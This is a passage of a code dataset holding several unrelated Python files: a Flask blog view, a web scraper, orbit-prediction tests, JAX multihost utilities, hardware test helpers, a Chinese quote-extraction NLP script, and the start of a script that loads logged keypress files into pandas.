top_tags=top_tags)\r\n\r\n\r\n@app.route('/user/')\r\ndef user(username):\r\n \"\"\"View function for user page\"\"\"\r\n user = db.session.query(User).filter_by(username=username).first_or_404()\r\n posts = user.posts.order_by(Post.publish_date.desc()).all()\r\n recent, top_tags = sidebar_data()\r\n\r\n return render_template('user.html',\r\n user=user,\r\n posts=posts,\r\n recent=recent,\r\n top_tags=top_tags)","sub_path":"PycharmProjects/Reptile/Djang-flask/M(V)C_view.py","file_name":"M(V)C_view.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"549619822","text":"\nimport socket\nimport requests.packages.urllib3.util.connection as urllib3_cn\nfrom hashlib import sha256\nimport pickle\nimport gzip\nfrom pathlib import Path\n\nimport requests\nimport bs4\nimport json\nimport pickle\nimport datetime\nfrom concurrent.futures import ProcessPoolExecutor as PPE\nimport itertools\nimport pandas as pd\nimport re\n\nHERE = Path(__file__).resolve().parent\nTOP_FOLDER = Path(__file__).resolve().parent.parent.parent\n\nPath(f'{TOP_FOLDER}/var/TB/downloads').mkdir(exist_ok=True, parents=True)\n\ndef get_hashed_fs(url):\n hashed = sha256(bytes(url, 'utf8')).hexdigest()[:16]\n fn = f'{TOP_FOLDER}/var/TB/downloads/{hashed}'\n return fn\n\n\ndef is_deleted(url):\n fn = get_hashed_fs(url)\n if not Path(fn).exists():\n return False\n obj = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n if obj['DELETED'] == True:\n return True\n else:\n return False\n\n\ndef is_over_5times(url):\n fn = get_hashed_fs(url)\n if not Path(fn).exists():\n return False\n obj = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n if len(obj['HTMLS']) >= 3:\n return True\n else:\n return False\n\n\ndef save(url, obj):\n fn = get_hashed_fs(url)\n # if not Path(fn).exists():\n open(fn, 'wb').write(gzip.compress(pickle.dumps(obj)))\n\ndef delete(url):\n fn = get_hashed_fs(url)\n Path(fn).unlink()\n\ndef get(url):\n fn = get_hashed_fs(url)\n if not Path(fn).exists():\n return None\n obj = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n return obj\n\n\ndef update_html(url, obj):\n fn = get_hashed_fs(url)\n obj_ = pickle.loads(gzip.decompress(open(fn, 'rb').read()))\n obj_['HTMLS'].append(obj)\n save(url, obj_)\n\n\ndef allowed_gai_family():\n \"\"\"\n https://github.com/shazow/urllib3/blob/master/urllib3/util/connection.py\n \"\"\"\n family = socket.AF_INET\n # if urllib3_cn.HAS_IPV6:\n # family = socket.AF_INET6 # force ipv6 only if it is available\n return family\n\n\nurllib3_cn.allowed_gai_family = allowed_gai_family\n\n\ndef get_seeds():\n '''\n 最も最近に投稿されたまとめから最大値を逆算する\n '''\n print(f'try to get_seed {__name__}.')\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.131 Safari/537.36',\n 'referer': 'https://www.google.com/'\n }\n r = requests.get('https://togetter.com/recent', headers=headers)\n thumbs = bs4.BeautifulSoup(r.text, 'lxml').find('div', {'class': 'topics_box'}).find_all('a', {'class': 'thumb'})\n thumb = thumbs[0]\n max_url = thumb.get('href')\n max_post_id = re.search(r'https://togetter.com/li/(.*?$)', max_url).group(1)\n if max_post_id.isdigit() is False:\n raise Exception('There is any wrong to get latest id.')\n print(f'finish to get_seed {__name__}.')\n return max_post_id\n","sub_path":"DataCollection/TogetterSystem/FSDB.py","file_name":"FSDB.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"403402392","text":"#Peräkkäishaku\n# tuodaan random ja time paketit\nimport random \nimport time\nlista = [] # alustetaan lista\n\nfor x in range(0,100000001):\n lista.append(x) # lisätään listaan haluttu määrä lukuja nollasta eteenpäin\n \ndef Peräkkäis(lista = []): # luodaan funktio, joka toteuttaa peräkkäishaun\n etsi = len(lista) -1 # asetetaan etsittäväksi luvuksi listan viimeinen luku\n for i in range (len(lista)): # for silmukka, jossa käydään listan alkiot yksi kerrallaan läpi\n if lista[i] == etsi: # verrataan i:n arvoa etsittävän numeron arvoon\n return(\"Hakemasi numero löytyi muistipaikalta: \"\n + str(i)) # jos etsittävä numero löytyy, palautetaan muistipaikan numero\n break;# silmukka keskeytetään\n return(\"Hakemaasi numeroa ei löytynyt\") # jos lista käydään kokonaan läpi, eikä etsittävää numeroa löydy, palautetaan ilmoitus\n\n\nstart = time.time() # aloitetaan kellotus\nprint(Peräkkäis(lista))# kutsutaan Peräkkäis funktiota lista parametrillä\nend = time.time() # pysäytetään kellotus\n\nprint(\"Hakuun kului aikaa\", end-start, \"sekuntia\") # tulostetaan hakuun kulunut aika","sub_path":"Other/Tietorakenteet ja algoritmit/Peräkkäishaku.py","file_name":"Peräkkäishaku.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"28080077","text":"# MIT License\n#\n# Copyright (c) 2017 Satellogic SA\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport datetime\nimport os\nimport shutil\nimport tempfile\nimport unittest\n\nfrom orbit_predictor import sources\nfrom orbit_predictor.accuratepredictor import HighAccuracyTLEPredictor\nfrom orbit_predictor.predictors import TLEPredictor\n\ntry:\n from unittest.mock import Mock, patch\nexcept ImportError:\n from mock import Mock, patch # Python2\n\ntry:\n from urllib import parse as urlparse\nexcept ImportError:\n import urlparse # Python2\n\n\nSATE_ID = \"AAUSAT-II\"\nSAMPLE_TLE = (\"1 32788U 08021F 15227.82608814 .00001480 00000-0 15110-3 0 9997\",\n \"2 32788 97.6474 275.2739 0011863 204.9398 155.1249 14.92031413395491\")\n\nSAMPLE_TLE2 = (\"1 32791U 08021J 15228.17298173 .00001340 00000-0 14806-3 0 9999\",\n \"2 32791 97.6462 271.6584 0012961 215.4867 144.5490 14.88966377395242\")\n\n\nclass TestMemoryTLESource(unittest.TestCase):\n def setUp(self):\n self.db = sources.MemoryTLESource()\n\n def test_add_tle(self):\n self.db.add_tle(SATE_ID, SAMPLE_TLE, datetime.datetime.now())\n tle = self.db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE)\n\n def test_add_tle_twice(self):\n self.db.add_tle(SATE_ID, SAMPLE_TLE, datetime.datetime.now())\n self.db.add_tle(SATE_ID, SAMPLE_TLE2, datetime.datetime.now())\n tle = self.db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE2)\n\n def test_add_tle_two_id(self):\n self.db.add_tle(SATE_ID, SAMPLE_TLE, datetime.datetime.now())\n self.db.add_tle(\"fake_id\", SAMPLE_TLE2, datetime.datetime.now())\n tle = self.db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE)\n\n def test_empty(self):\n with self.assertRaises(LookupError):\n self.db._get_tle(SATE_ID, datetime.datetime.now())\n\n # this methods are from TLESource()\n def test_get(self):\n date = datetime.datetime.now()\n self.db.add_tle(SATE_ID, SAMPLE_TLE, date)\n tle = self.db.get_tle(SATE_ID, date)\n self.assertEqual(tle.lines, SAMPLE_TLE)\n self.assertEqual(tle.sate_id, SATE_ID)\n self.assertEqual(tle.date, date)\n\n def test_get_predictor(self):\n predictor = self.db.get_predictor(SATE_ID)\n\n self.assertIsInstance(predictor, TLEPredictor)\n self.assertEqual(predictor.sate_id, SATE_ID)\n self.assertEqual(predictor.source, self.db)\n\n def test_get_predictor_precise(self):\n predictor = self.db.get_predictor(SATE_ID, precise=True)\n self.assertIsInstance(predictor, HighAccuracyTLEPredictor)\n self.assertEqual(predictor.sate_id, SATE_ID)\n self.assertEqual(predictor.source, self.db)\n\n\nclass TestEtcTLESource(unittest.TestCase):\n def setUp(self):\n self.dirname = tempfile.mkdtemp()\n self.filename = os.path.join(self.dirname, \"tle_file\")\n\n with open(self.filename, \"w\") as fd:\n fd.write(SATE_ID + \"\\n\")\n for l in SAMPLE_TLE:\n fd.write(l + \"\\n\")\n\n def test_add_tle(self):\n db = sources.EtcTLESource(self.filename)\n\n db.add_tle(SATE_ID, SAMPLE_TLE2, datetime.datetime.now())\n tle = db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE2)\n\n def test_read_tle(self):\n db = sources.EtcTLESource(self.filename)\n\n tle = db._get_tle(SATE_ID, datetime.datetime.now())\n self.assertEqual(tle, SAMPLE_TLE)\n\n def test_wrong_sate(self):\n db = sources.EtcTLESource(self.filename)\n\n with self.assertRaises(LookupError):\n db._get_tle(\"fake_id\", datetime.datetime.now())\n\n def tearDown(self):\n shutil.rmtree(self.dirname)\n\n\nclass TestWSTLESource(unittest.TestCase):\n def setUp(self):\n self.mock_json = {\n \"date\": \"2015-01-15T08:56:33Z\",\n \"lines\": [\n \"1 40014U 14033E 15014.37260739 .00003376 00000-0 33051-3 0 6461\",\n \"2 40014 97.9772 276.7067 0034296 17.9121 342.3159 14.92570778 31092\"\n ]\n }\n\n self.expected_lines = (\n \"1 40014U 14033E 15014.37260739 .00003376 00000-0 33051-3 0 6461\",\n \"2 40014 97.9772 276.7067 0034296 17.9121 342.3159 14.92570778 31092\")\n\n self.headers = {'user-agent': 'orbit-predictor', 'Accept': 'application/json'}\n\n @patch(\"requests.get\")\n def test_get_tle(self, mocked_requests):\n expected_url = urlparse.urlparse(\n \"http://test.none/api/tle/closest/?date=2015-01-01&satellite_number=40014U\")\n expected_qs = urlparse.parse_qs(expected_url.query)\n\n mocked_response = Mock()\n mocked_response.ok = True\n mocked_response.json.return_value = self.mock_json\n mocked_requests.return_value = mocked_response\n\n source = sources.WSTLESource(url=\"http://test.none/\")\n tle = source._get_tle('40014U', datetime.datetime(2015, 1, 1))\n\n call_args = mocked_requests.call_args\n url = urlparse.urlparse(call_args[0][0])\n url_qs = urlparse.parse_qs(url.query)\n\n self.assertEqual(url.path, expected_url.path)\n self.assertEqual(url_qs, expected_qs)\n self.assertEqual(call_args[1], {'headers': self.headers})\n self.assertEqual(tle, self.expected_lines)\n\n @patch(\"requests.get\")\n def test_get_last_update(self, mocked_requests):\n url = \"http://test.none/api/tle/last/?satellite_number=40014U\"\n mocked_response = Mock()\n mocked_response.ok = True\n mocked_response.json.return_value = self.mock_json\n mocked_requests.return_value = mocked_response\n\n source = sources.WSTLESource(url=\"http://test.none/\")\n tle = source.get_last_update('40014U')\n\n mocked_requests.assert_called_with(url, headers=self.headers)\n self.assertEqual(tle, self.expected_lines)\n","sub_path":"tests/test_sources.py","file_name":"test_sources.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"366867132","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities for synchronizing and communication across multiple hosts.\"\"\"\n\nimport functools\nfrom typing import Optional\nimport zlib\n\nimport jax\nfrom jax.tree_util import PyTreeDef\nfrom jax.experimental import maps\nfrom jax.experimental.pjit import pjit, FROM_GDA\nfrom jax.interpreters.pxla import PartitionSpec as P\nfrom jax.experimental.global_device_array import GlobalDeviceArray\nimport numpy as np\n\n\n# This needs to be top-level for the jax compilation cache.\n@functools.partial(jax.pmap, axis_name='hosts')\ndef _psum(x: PyTreeDef) -> PyTreeDef:\n return jax.lax.psum(x, 'hosts')\n\n\ndef broadcast_one_to_all(in_tree: PyTreeDef,\n is_source: Optional[bool] = None) -> PyTreeDef:\n \"\"\"Broadcast data from a source host (host 0 by default) to all other hosts.\n\n Args:\n in_tree: pytree of arrays - each array *must* have the same shape across the\n hosts.\n is_source: optional bool denoting whether the caller is the source. Only\n 'source host' will contribute the data for the broadcast. If None, then\n host 0 is used.\n\n Returns:\n A pytree matching in_tree where the leaves now all contain the data from the\n first host.\n \"\"\"\n if is_source is None:\n is_source = jax.process_index() == 0\n\n def pre_pmap(x):\n if isinstance(x, GlobalDeviceArray):\n raise ValueError('GDAs cannot be broadcasted from source host to other '\n 'hosts.')\n if is_source:\n return np.concatenate([\n x[None, ...],\n np.repeat([np.zeros_like(x)],\n jax.local_device_count() - 1, 0)\n ])\n else:\n return np.repeat([np.zeros_like(x)], jax.local_device_count(), 0)\n\n def post_pmap(x):\n return jax.device_get(x)[0]\n\n in_tree = jax.tree_map(pre_pmap, in_tree)\n in_tree = jax.device_get(_psum(in_tree))\n return jax.tree_map(post_pmap, in_tree)\n\n\ndef sync_global_devices(name: str):\n \"\"\"Creates a barrier across all hosts/devices.\"\"\"\n h = np.int32(zlib.crc32(name.encode()))\n assert_equal(h, f\"sync_global_devices name mismatch ('{name}')\")\n\n\ndef process_allgather(in_tree: PyTreeDef, tiled: bool = False) -> PyTreeDef:\n \"\"\"Gather data from across processes.\n\n Args:\n in_tree: pytree of arrays - each array _must_ have the same shape across the\n hosts.\n tiled: Whether to stack or concat the output. Defaults to False i.e. stack\n into a new positional axis at index 0.\n This does not affect GDA inputs as the GDA output will always be\n concatenated.\n Scalar inputs will always be stacked.\n\n Returns:\n Pytress of arrays where the data is gathered from all hosts.\n * If the input is a GDA, then the data is fully replicated.\n * If the input is non-GDA, then the output shape is dependent on the\n `tiled` argument. If its False, then the output will be stacked else\n concatenated.\n * If the input is non-GDA and scalar, then the output will be stacked.\n \"\"\"\n\n def _pjit(inp):\n if isinstance(inp, GlobalDeviceArray):\n if inp.is_fully_replicated:\n return inp.local_data(0).to_py()\n global_mesh = inp.mesh\n in_axis_resources = FROM_GDA\n else:\n # DA/SDA/np.array will be sharded based on global_mesh.local_mesh.\n # Shape of local_mesh will always be (1, local_device_count())\n devices = np.array(jax.devices()).reshape(jax.process_count(),\n jax.local_device_count())\n global_mesh = maps.Mesh(devices, ('processes', 'local_devices'))\n in_axis_resources = P('processes')\n if inp.ndim == 0 or not tiled:\n inp = np.expand_dims(inp, axis=0)\n\n with maps.Mesh(global_mesh.devices, global_mesh.axis_names):\n out = pjit(lambda x: x, in_axis_resources=in_axis_resources,\n out_axis_resources=None)(inp)\n return out.local_data(0).to_py()\n\n with jax._src.config.parallel_functions_output_gda(True):\n return jax.tree_map(_pjit, in_tree)\n\n\ndef assert_equal(in_tree, fail_message: str = ''):\n \"\"\"Verifies that all the hosts have the same tree of values.\"\"\"\n expected = broadcast_one_to_all(in_tree)\n if not jax.tree_util.tree_all(\n jax.tree_map(lambda *x: np.all(np.equal(*x)), in_tree, expected)):\n raise AssertionError(\n f'{fail_message} Expected: {expected}; got: {in_tree}.')\n","sub_path":"jax/experimental/multihost_utils.py","file_name":"multihost_utils.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"457789665","text":"# _*_ coding: utf-8 _*_\r\n\r\nfrom PIL import Image,ImageFont,ImageDraw,ImageColor\r\n\r\ndef image_add_num(image,text):\r\n # 设置字体\r\n font = ImageFont.truetype(\"arial.ttf\",50)\r\n # 设置字体颜色\r\n font_color = ImageColor.colormap.get('red')\r\n # 将字体加到图片上\r\n draw = ImageDraw.Draw(image)\r\n width,height = image.size\r\n print(width-50,height)\r\n draw.text((width-50,30),text,font=font,fill=font_color)\r\n # 保存图片\r\n image.save(\"image_2.jpg\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n image = Image.open(\"image_1.jpg\")\r\n text = \"4\"\r\n image_add_num(image,text)","sub_path":"0/0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74411093","text":"import sys\nimport test.iio_scanner as iio_scanner\nfrom test.globals import *\n\nimport iio\n\nimport adi\nimport numpy as np\nimport pytest\n\n\ndef command_line_config(request):\n if request.config.getoption(\"--error_on_filter\"):\n global ignore_skip\n ignore_skip = True\n\n global target_uri_arg\n target_uri_arg = request.config.getoption(\"--uri\")\n if not target_uri_arg:\n target_uri_arg = None\n\n global imported_config\n filename = request.config.getoption(\"--test-configfilename\")\n imported_config = get_test_config(filename)\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--error_on_filter\",\n action=\"store_true\",\n help=\"When device is not found generate error not skip\",\n )\n parser.addoption(\n \"--uri\",\n action=\"store\",\n help=\"Run test on device with the given uri. IP scanning will be skipped.\",\n )\n parser.addoption(\n \"--test-configfilename\",\n action=\"store\",\n help=\"Import custom configuration file not in default location.\",\n )\n\n\ndef pytest_configure(config):\n # Add customer marks to ini to remove warnings\n from test import test_map as tm\n\n test_map = tm.get_test_map()\n vals = []\n for k in test_map:\n vals = vals + test_map[k]\n keys = np.unique(np.array(vals))\n for k in keys:\n config.addinivalue_line(\"markers\", k.replace(\"-\", \"_\"))\n\n\ndef pytest_collection_modifyitems(items):\n # Map HDL project names to tests as markers\n from test import test_map as tm\n\n test_map = tm.get_test_map()\n test_map_keys = test_map.keys()\n\n for item in items:\n if item.originalname:\n for key in test_map_keys:\n if key in item.originalname:\n for marker in test_map[key]:\n item.add_marker(marker.replace(\"-\", \"_\"))\n break\n\n\nclass BaseTestHelpers:\n devicename = \"pluto\"\n skipped_tests = [] # type: ignore\n classname = \"adi.ad9361\"\n uri = \"ip:pluto.local\"\n\n def check_skip(self):\n # Check if calling function is in skip list\n calling_func = sys._getframe(1).f_code.co_name\n global ignore_skip\n if (calling_func in self.skipped_tests) or (not self.check_dev()):\n if not ignore_skip:\n # Will skip test if board not found or calling_func in skipped_tests\n pytest.skip(\"Skipping\")\n else:\n # Will fail if board not found or calling_func in skipped_tests\n pytest.fail(\"Board not found!\")\n\n def check_dev(self):\n # Must use globals since each test is a separate class instance\n global found_devices\n global found_uris\n global target_uri_arg\n global imported_config\n global ignore_skip\n if not isinstance(self.devicename, list):\n ds = [self.devicename]\n else:\n ds = self.devicename\n dev_checked = False\n found_dev = False\n for d in ds:\n if d in found_devices:\n found_dev = found_devices[d]\n # If device was already found before, update the board interface URI\n self.uri = found_uris[d]\n dev_checked = True\n break\n\n if not dev_checked:\n if target_uri_arg:\n found_dev, board = iio_scanner.find_device(\n self.devicename, target_uri_arg, imported_config, ignore_skip\n )\n else:\n found_dev, board = iio_scanner.find_device(\n self.devicename, None, imported_config, ignore_skip\n )\n\n if found_dev:\n found_devices[board.name] = found_dev\n found_uris[board.name] = board.uri\n self.uri = board.uri\n else:\n for d in ds:\n found_devices[d] = False\n found_uris[d] = \"\"\n return found_dev\n\n def dev_interface(self, val, attr, tol):\n sdr = eval(self.classname + \"(uri='\" + self.uri + \"')\")\n # Check hardware\n if not hasattr(sdr, attr):\n raise AttributeError(attr + \" not defined in \" + self.classname)\n setattr(sdr, attr, val)\n rval = getattr(sdr, attr)\n if not isinstance(rval, str):\n rval = float(rval)\n del sdr\n if not isinstance(val, str):\n if abs(val - rval) > tol:\n print(\"Failed to set: \" + attr)\n print(\"Set: \" + str(val))\n print(\"Got: \" + str(rval))\n return abs(val - rval)\n else:\n return val == str(rval)\n\n def iio_dev_interface(self, attrtype, dev_name, chan_name, inout, attr, val, tol):\n sdr = iio.Context(self.uri)\n attr_tl = attrtype.lower()\n\n if attr_tl == \"context\":\n ats = sdr.attrs\n ats[attr].Value = str(val)\n rval = float(sdr.attrs[attr].Value)\n elif attr_tl == \"debug\":\n raise Exception(\"Not supported\")\n elif attr_tl == \"device\":\n dev = sdr.find_device(dev_name)\n assert dev, \"Device Not Found\"\n dev.attrs[attr].Value = str(val)\n rval = float(dev.attrs[attr].Value)\n elif attr_tl == \"channel\":\n dev = sdr.find_device(dev_name)\n assert dev, \"Device Not Found\"\n chan = dev.find_channel(chan_name, inout)\n assert chan, \"Channel Not Found\"\n chan.attrs[attr].Value = str(val)\n rval = float(chan.attrs[attr].Value)\n else:\n raise Exception(\"Device type unknown \" + str(attrtype))\n\n del sdr\n if not isinstance(val, str):\n if abs(val - rval) > tol:\n print(\"Failed to set: \" + attr)\n print(\"Set: \" + str(val))\n print(\"Got: \" + str(rval))\n return abs(val - rval)\n return val == str(rval)\n\n\nclass BoardInterface(BaseTestHelpers):\n def __init__(self, classname=None, devicename=None):\n self.classname = classname\n self.devicename = devicename\n self.uri = \"\"\n self.check_skip()\n","sub_path":"test/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48949500","text":"#获取人名说了什么话,返回人名 论点\nimport jieba.posseg as psg\nimport jieba,re\nfrom stanfordcorenlp import StanfordCoreNLP\nimport os, sys\nfrom pyltp import SentenceSplitter, Segmentor, Postagger, Parser, NamedEntityRecognizer, SementicRoleLabeller\n\n\ndef get_say(filename):\n '''获取说的词典'''\n res=[]\n f_r=open(filename,\"r\",encoding=\"utf-8\")\n for line in f_r:\n line=line.strip(\"\\n\")\n lines=line.split(\",\")\n res.extend([data for data in lines if data])\n return list(set(res))\n\n\ndef raplace_line_feed(sentence):\n return sentence.replace(\"\\u3000\",\" \")\n\ndef more_space_to_one(sentence):\n sen=jieba.lcut(sentence)\n new_data=[]\n for data in sen:\n if new_data:\n if new_data[-1] not in [\" \",\" \"]:\n new_data.append(data)\n elif data not in [\" \",\" \"]:\n new_data.append(data)\n else:\n new_data.append(data)\n return \"\".join(new_data)\n\n\ndef get_name(netags,words):\n res=[]\n #print(list(netags))\n for i,data in enumerate(list(netags)):\n if data[2:]==\"Nh\":\n res.append(words[i])\n return list(set(res))\n\n\ndef get_one_name(new_sentence):\n #对于这个句子进行文本处理,获取这个句子中的姓名实体\n name_list=[]\n # new_sentence=raplace_line_feed(new_sentence)\n # new_sentence=more_space_to_one(new_sentence)\n ner_data=psg.lcut(new_sentence)\n i=0\n for w,tag in ner_data:\n if tag==\"nr\":\n name_list.append(w)\n i += 1\n return list(set(name_list))\n\n\ndef get_dependency_word(sentence):\n '''获取句法分析'''\n # global nlp\n parse_res=[]\n nlp = StanfordCoreNLP(r'D:/stanford/stanford-corenlp-full-2018-10-05', lang='zh')\n word = nlp.word_tokenize(sentence)\n res = nlp.dependency_parse(sentence)\n new_data = []\n new_data.append(\"ROOT\")\n new_data += word\n for i, w in enumerate(res):\n parse_res.append([w[0], new_data[int(w[1])], new_data[int(w[2])]])\n nlp.close()\n return parse_res\n\n\ndef judge_which_say(say_words,sentence):\n '''判断句子中有哪个表示说的词'''\n res_words=[]\n # wordslist=list(set(jieba.lcut(sentence)))\n for word in say_words:\n if word in sentence:\n return True\n return False\n\n\ndef get_say_sentence(sentence,say):\n '''获取包含say的最简短的sentence'''\n senlist=[]\n new_sen=sentence.split(r\"\\n\")\n for sen in new_sen:\n if say in sen:\n senlist.append(sen)\n return senlist\n\ndef get_saywords(sentence,say,per):\n if sentence[-1] != \"。\":\n res1 = re.findall(per + \"(?:[^,.。))]*?)\" + say + \"(?:[^.。]*?)\" + \"(?:,|:|:|,)([\\s\\S]*?)$\", sentence)\n else:\n res1 = re.findall(per + \"(?:[^,.。))]*?)\" + say + \"(?:[^.。]*?)\" + \"(?:,|:|:|,)([\\s\\S]*?)。\", sentence)\n res2 = re.findall('(?:“|\")([\\s\\S]*?)(?:”|\")(?:,|,)?' + \"(?:[^,.。,)]*?)\" + per + \"(?:[^,.。,)]*?)\" + say, sentence)\n if res2!=[]:\n return res2[0]\n if res1!=[]:\n return res1[0]\n return \"\"\n\ndef judge_parse(parse_list,say,sentence):\n '''对解析的内容进行判断是不是'''\n says=\"\"\n idex=0\n name=\"\"\n for i,data in enumerate(parse_list):\n if data[0]==\"nsubj\" and data[1]==say:\n if get_one_name(data[-1])==[data[-1]]:\n # idex=i\n name=data[-1]\n if data[0]==\"punct\":\n idex=i\n if i>idex and data[0]!=\"punct\" and idex!=0:\n says+=data[-1]\n else:\n says=get_saywords(sentence, say, name)\n return says,name\n\n\ndef get_per_and_say(say_list,postags,words,sentence,parser):\n # words = segmentor.segment(sentence)\n atts={}\n per_say=[]\n s=list(words)\n res=[]\n res.append(\"ROOT\")\n res.extend(list(words))\n arcs = parser.parse(words, postags)\n dd=[(s[i],res[int(arc.head)],arc.relation) for i,arc in enumerate(arcs)]\n for da in dd:\n if da[-1]==\"SBV\":\n if da[1] in say_list:\n if da[0] in atts:\n poss_per=\"\".join(atts[da[0]])\n if poss_per in sentence:\n per_say.append((poss_per+da[0],da[1]))\n else:\n per_say.append((poss_per+da[0],da[1]))\n if da[-1]==\"ATT\":\n if da[1] not in atts:\n atts[da[1]]=[]\n atts[da[1]].append(da[0])\n return per_say\n\n\n#一个人说的话一共三种情况,1.最简单的一种就是人名后面紧跟说,说后面紧跟说的话 2.人名后面紧跟说,人名前面用引号引住说的话。3.其他格式\ndef get_some_idea(say_words,postags,words,senten,parser):\n #根据与表述相关的词的词库,获取每个人说的话\n say_words_list={}\n per_say=get_per_and_say(say_words,postags,words,senten,parser)#say_list,postags,words,sentence,parser\n if per_say!=[]:\n for data in per_say:\n if len(data)==2:\n ls=get_saywords(senten,data[-1],data[0])\n if ls:\n if data[0] not in say_words_list:\n say_words_list[data[0]] = []\n say_words_list[data[0]].append((data[-1], ls))\n return say_words_list\n\n\ndef get_models():\n LTP_DATA_DIR = r'ltp_data_v3.4.0' # LTP模型目录路径\n # 分词\n segmentor = Segmentor() # 初始化\n segmentor.load(os.path.join(LTP_DATA_DIR, 'cws.model')) # 加载模型\n # 词性标注\n postagger = Postagger() # 初始化\n postagger.load(os.path.join(LTP_DATA_DIR, 'pos.model')) # 加载模型\n parser = Parser()\n parser.load(os.path.join(LTP_DATA_DIR, 'parser.model'))\n return segmentor,postagger,parser\n\n\ndef get_all_say_sentence(r_filename,w_file):\n segmentor, postagger, parser=get_models()\n say_words = get_say(\"say.txt\")\n f_r=open(r_filename,\"r\",encoding=\"utf-8\")\n f_w=open(w_file,\"w\",encoding=\"utf-8\")\n for line in f_r:\n lines=line.strip(\"\\n\").split(r\"\\n\")\n for senten in lines:\n have_or_not=judge_which_say(say_words,senten)\n if have_or_not:\n new_sentence = raplace_line_feed(senten)\n new_sentence = more_space_to_one(new_sentence)\n words = segmentor.segment(new_sentence)\n postags = postagger.postag(words)\n sen=get_some_idea(say_words,postags,words,new_sentence,parser)\n if sen:\n for key in sen:\n sens=\"\\t\".join(list(set([data[1] for data in sen[key]])))\n f_w.write(key +\"\\t\"+sens +\"\\n\")\n f_r.close()\n f_w.close()\n\n\ndef get_one_say_sentence(line):\n res={}\n segmentor, postagger, parser=get_models()\n say_words = get_say(\"say.txt\")\n lines=line.strip(\"\\n\").split(r\"\\n\")\n for senten in lines:\n have_or_not=judge_which_say(say_words,senten)\n if have_or_not:\n new_sentence = raplace_line_feed(senten)\n new_sentence = more_space_to_one(new_sentence)\n words = segmentor.segment(new_sentence)\n postags = postagger.postag(words)\n sen=get_some_idea(say_words,postags,words,new_sentence,parser)\n if sen:\n for key in sen:\n sens=\"\\t\".join(list(set([data[1] for data in sen[key]])))\n if key not in res:\n res[key]=[]\n res[key].append(sens)\n return res\n\n\nif __name__==\"__main__\":\n # get_all_name(\"lclnew.txt\",\"name.txt\")\n #print(get_dependency_word(\"刘春玲慷慨激昂的说道,这里没有东西\"))\n # res=get_one_name(\"刘春玲说了什么话\")\n s=get_one_say_sentence(\"刘春玲说,部队啊。\")\n print(s)\n","sub_path":"project1/parse_sentences.py","file_name":"parse_sentences.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13086950","text":"import pandas as pd\nimport datetime\nimport os\nimport numpy as np\nimport itertools\n\nos.chdir('../')\n\nfrom configs.keylog_cfg import *\n\n#####################\n##### functions #####\n#####################\n\ndef raw_keylog_data_to_df(raw_keylogged_data):\n\n list_of_dfs = []\n\n counter = 0\n\n for data in raw_keylogged_data:\n\n tmp = {k:v for k,v in [i.split(': ') for i in data]}\n raw_keylog_dict = {}\n raw_keylog_dict['timestamp'] = list(tmp.keys())\n raw_keylog_dict['keypress'] = list(tmp.values())\n\n df_tmp = pd.DataFrame(raw_keylog_dict)\n df_tmp['file_suffix'] = files_to_read[counter][-11:].replace('.', '').replace('txt', '')\n counter += 1\n\n list_of_dfs.append(df_tmp)\n\n df = pd.concat(list_of_dfs, axis=0)\n\n return 